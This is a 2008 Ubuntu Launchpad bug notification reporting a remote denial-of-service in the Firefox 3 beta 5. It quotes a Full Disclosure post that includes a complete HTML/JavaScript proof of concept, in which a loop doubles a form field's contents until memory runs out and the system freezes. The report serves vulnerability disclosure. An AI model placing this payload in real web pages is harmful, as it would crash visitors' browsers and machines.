[Bug 220339] [NEW] Firefox 3b5 remote DoS using JavaScript

Alexander Konovalenko alexkon at gmail.com
Mon Apr 21 19:06:15 UTC 2008 

*** This bug is a security vulnerability ***

Public security bug reported:

Binary package hint: firefox-3.0

>From http://own-the.net/news_Firefox-3b5-on-Ubuntu-(DoS)_15.html
(via Full Disclosure), reported by K-Gen:

"I'll be honest, I was very surprised by this find. Very surprised. As a
matter of fact, this was the first time I ever managed to crash Linux
completely... Through a web browser.

The attack is too simple to brag about, just a simple JS that takes up a
lot of memory fast.

<html>
<body>
	<form method = "GET" action = "bla">
		<input name = "vuln" value = "012345678901234567890123456789012345678901234567890123456789">
	</form>

	<script>
		for (i=0; i<=5000; i++){
			document.forms[0].vuln.value += document.forms[0].vuln.value;
		}
	</script>

</body>
</html>

This algorithm takes M*2^N bytes of memory (where M is the length of the
"vuln" field and N is the number of loop iterations). You would expect
the browser to alert you that this script is going to take a really long
time to execute, but apparently, this doesn't happen.

After one second of this script running, Firefox stopped responding, a
few seconds later I couldn't even launch the Force Quit applet, a few
seconds after that the system reached a screeching halt.

I have a vague idea of how this is possible, but I guess this is related
to the new GTK+ forms in FF 3. I ran this script on Windows in Firefox
2, and nothing too scary happened. It did take up 1GB of memory in 5
seconds, but as it appeared, some limit was reached and the page was
loaded with nothing more exciting than blank text field. The same
happened with IE 6.

Note however, that the windows machine had twice more RAM and processing
power than the Linux machine, so I'm not sure whether this was a very
"scientific" test. (I should also try installing FF 3 for Windows and
see what happens).

Certainly, I know FF 3 is beta software. However, what really shocked me
here is how easy it was to overload the whole system through a web page.
This certainly isn't "expected behavior"."

** Affects: firefox-3.0 (Ubuntu)
     Importance: Undecided
         Status: New

** Visibility changed to: Public

-- 
Firefox 3b5 remote DoS using JavaScript
https://bugs.launchpad.net/bugs/220339
You received this bug notification because you are a member of Mozilla
Bugs, which is subscribed to firefox-3.0 in ubuntu.

More information about the Ubuntu-mozillateam-bugs mailing list